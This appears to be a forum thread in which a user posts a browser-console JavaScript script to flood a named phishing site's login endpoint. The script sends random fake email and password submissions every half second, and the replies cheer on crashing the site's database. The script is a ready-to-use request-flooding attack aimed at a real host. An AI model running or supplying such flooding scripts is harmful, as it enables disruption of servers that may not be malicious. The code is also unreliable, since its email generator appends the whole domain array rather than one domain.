恶搞钓鱼网站
看到一个帖子 https://www.52pojie.cn/forum.php?mod=viewthread&tid=1368263&page=1于是下午没干正事写了这一段玩具。
使用方法,
1、打开钓鱼网址 http://www.valmontcn.com/wp-admin/wt/sign-in/wt.php
2、按F12切换到console,粘贴下边的代码回车即可。
不知道效果如何,有兴趣的可以自己架一个页面测试一下。
function getRandInt(min, max) {
return Math.floor(Math.random() * (max - min)) + min;
}
function getRandStr(length=4) {
var arr = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ".split('');
arr.sort(function(a, b){return 0.5 - Math.random()});
return arr.slice(0, length).join('');
}
function getRandEmail(){
var arr = [];
arr.push("@qq.com");
arr.push("@sina.com");
arr.push("@yahoo.com");
arr.push("@163.com");
arr.push("@126.com");
arr.push("@gmail.com");
arr.push("@live.com");
arr.push("@live.cn");
var index = Math.floor(Math.random() * arr.length);
return getRandStr(getRandInt(3,8)) + arr;
}
var xmlHttp = new XMLHttpRequest();
var i = 0;
var url = 'https://www.valmontcn.com/wp-admin/wt/sign-in/post.php';
setInterval(function () {
var login = getRandEmail();
var pass = getRandStr(getRandInt(8,26));
var data = 'login=' + login + '&pass='+ pass +'&formimage1.x=35&formimage1.y=23';
xmlHttp.open("POST", url, true);
//xmlHttp.setRequestHeader("header", "value");
//xmlHttp.onreadystatechange = getData;
xmlHttp.send(data);
console.log(++i);
//console.log(xmlHttp.readyState);
console.log(data);
}, 500); 好家伙·······网络不安全
好家伙……我直接好家伙
这网站削微简陋了点 给他数据库晒爆 随机数生成邮箱写脏数据? {:1_905:}24小时挂着 应该会被防火墙拉黑吧 流弊!好像很厉害的样子 fanvalen 发表于 2021-2-8 18:01
给他数据库晒爆
删库大法:Dweeqw
页:
[1]
2